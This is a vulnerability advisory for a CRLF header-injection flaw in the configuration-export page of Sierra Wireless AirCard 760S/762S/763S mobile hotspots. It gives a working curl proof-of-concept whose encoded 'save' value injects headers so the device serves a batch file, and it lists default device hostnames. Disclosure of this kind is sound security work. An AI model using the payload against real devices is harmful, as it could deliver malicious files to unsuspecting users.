Sierra Wireless produces a mobile wi-fi hotspot device that is popular amongst telecommunication companies for re-branding to suit local markets. The AirCard 760S/762S/763S Web-based Administrative Console suffers from a HTTP header injection that allows an attacker to inject a file into the HTTP response from the device.
ded2a0627c3a429a64de38ac35a2932ed3eba1561ee7e5b46f1a77886f913fdd
Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection
[*] Overview
Sierra Wireless produces a mobile wi-fi hotspot device that is popular
amongst telecommunication companies for re-branding to suit local markets.
The AirCard 760S/762S/763S Web-based Administrative Console suffers from a
HTTP header injection that allows an attacker to inject a file into the
HTTP response from the device.
[*] Description
The configuration export function allows the name of the exported
configuration file to be customised, but the parameter "save" is not
filtered.
http://<routerURL>/export.cfg?save=export.cfg
[*] Traffic sample from POC
(curl -L)
(sample below tested on firmware SWI9200H2_03.05.11.00AP)
> GET /export.cfg?save=
> export.bat%0d%0aContent-type:%20application/bat%0d%0a%0d%0apause%0d%0a
> &sessionId=00000001%2DhYL4H
> 4jC125ApaZyFCHePwPINyFUdYf HTTP/1.1
> > User-Agent: curl/7.40.0
> > Host: router.4g
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> < Server: httpd/2.7 (sierra; D4C)
> < Date: Mon, 12 Jan 2015 05:32:38 GMT
> < Connection: keep-alive
> < Cache-Control: no-cache
> < Content-Disposition: attachment; filename=export.bat
> < Content-type: application/bat
>
> pause
> Content-type: application/octet-stream
> Transfer-encoding: chunked
> 3a
> #
> # Configuration export from Telstra WI-FI 4G
> #
> # Model:
[*] Limitations
While it does not require authentication, it does require user interaction
and knowledge of the hotspot's hostname.
However, the default hotspot names are well-known, based on the OEM'd
version of the AirCard Mobile Hotspot:
* 763S - Sierra Wireless Original OEM - http://aircard.hotspot
* 763S - Rogers Rocket Mobile Hotspot - http://rogers.hotspot
* 762S - DNA 4G WLAN Mokkula - http://dna.mokkula
* 760S - Telstra Mobile WiFi 4G - http://telstra.4g
* 760S - BigPond Mobile - http://bigpond.4g
[*] Workaround
Change the name and IP address of the device to something other than the
default settings.
[*] Vendor Contact
An attempt to contact both Sierra Wireless and NETGEAR (who seem to own
support of the device now) was unsuccessful.
regards
,
Luke